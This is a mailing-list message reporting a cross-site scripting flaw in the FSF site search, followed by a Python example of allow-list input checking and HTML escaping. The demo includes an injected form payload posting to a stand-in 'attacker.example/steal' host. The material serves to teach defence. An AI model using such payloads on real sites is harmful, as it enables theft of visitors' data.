Richard Stallman wrote:
I don't personally do most of our web site maintenance, of course.
But I take responsibility for removing this link if it should not be
there.
Can you tell the FSF web programmers to do more checking for HTML/SQL injection vulnerabilities?
I have found a vulnerability with your FSF search engine.

http://z505.com/gng/fsf-gnu-site-easy-to-hack.htm

Your programmers should check POST/GET variables and in many cases only allow alphanumeric characters in by default, not through JavaScript but at the server side during processing. Your search engine allows bad characters in, ones that can damage the site or cause malicious theft of logins or other data through cross-site scripting, by embedding forms/input boxes into the site that post to another domain.

In the framework I develop, this problem is secured by default.
The functions I use for getting POST/GET variables trim malicious attempts, while the programmer can choose to use the insecure, non-default raw function if he really needs to:
http://z505.com/cgi-bin/powtils/docs/1.6/idx.cgi?file=getcgivar&unit=pwumain
http://z505.com/cgi-bin/powtils/docs/1.6/idx.cgi?file=getcgivar_s&unit=pwumain

I suggest your web programmers read up on how to secure web programs by reading about what my GetCgiVar functions do, or by finding articles on the net that explain how you have to filter/check each incoming POST/GET request carefully each time.

I would have sent this privately to you, but many people will find this security info useful and humorous. It is my duty to teach people about web security, and only privately mailing you would mean thousands of people that read this list would miss out on learning about HTML injection. Plenty of large popular websites I visit are insecure in this very manner. Since this vulnerability is unfortunately exposed publicly, fixing it before too many people notice it would be good.

Regards,
L505
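The message above argues for two server-side defences on a search parameter: reject input that is not on an allow-list of characters, and never echo a request value into the page as raw markup. The following is an added example, not code from the FSF site or from the powtils library the message links to; the function names (`get_cgi_var_raw`, `get_cgi_var_safe`, `render_results_unsafe`, `render_results_safe`, `handle_search`) and the allow-list policy are assumptions made for illustration. It shows the raw and the allow-listed accessor side by side, and the vulnerable rendering beside its hardened form, using a constructed request containing an injected form that points at another domain.

```python
import html
import re

# Allow-list for a search query: letters, digits, spaces and a few
# punctuation characters a query legitimately needs. This is a constructed
# policy for the example, not powtils' or the FSF's rule. Input is rejected,
# not "cleaned", so the handler never reasons about partially sanitized data.
SEARCH_QUERY_RE = re.compile(r"[A-Za-z0-9 _.\-]{1,100}")


class InvalidParameter(ValueError):
    """Raised when a request variable fails the allow-list check."""


def get_cgi_var_raw(params: dict, name: str) -> str:
    """The insecure accessor: returns the value exactly as the client sent it.
    Kept only to show what the safe variant prevents."""
    return params.get(name, "")


def get_cgi_var_safe(params: dict, name: str) -> str:
    """The default accessor: returns the value only if every character is on
    the allow-list; anything else is an error, handled on the server side."""
    value = params.get(name, "")
    if not SEARCH_QUERY_RE.fullmatch(value):
        raise InvalidParameter(f"parameter {name!r} contains disallowed characters")
    return value


def render_results_unsafe(query: str) -> str:
    """Vulnerable rendering: the request value is interpolated into HTML as-is,
    so a value containing markup becomes part of the page."""
    return f"<p>Results for: <b>{query}</b></p>"


def render_results_safe(query: str) -> str:
    """Hardened rendering: every value is HTML-escaped at output time, so even
    an accepted value can never be interpreted as a tag or attribute."""
    return f"<p>Results for: <b>{html.escape(query, quote=True)}</b></p>"


def handle_search(params: dict) -> str:
    """Server-side handler combining the allow-list check with escaped output."""
    try:
        query = get_cgi_var_safe(params, "q")
    except InvalidParameter:
        return "<p>Invalid search query.</p>"
    return render_results_safe(query)


if __name__ == "__main__":
    # Constructed requests: a normal query and one carrying an injected form
    # that would post the visitor's input to a different domain.
    normal = {"q": "gnu emacs"}
    injected = {"q": '<form action="http://attacker.example/steal">'}

    print(render_results_unsafe(get_cgi_var_raw(injected, "q")))  # markup survives
    print(handle_search(injected))                                # rejected
    print(handle_search(normal))                                  # rendered, escaped
```

The two defences are deliberately independent: the allow-list stops hostile input at the boundary, and output escaping protects the page even if a later change relaxes the allow-list or a value reaches the template by another route.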
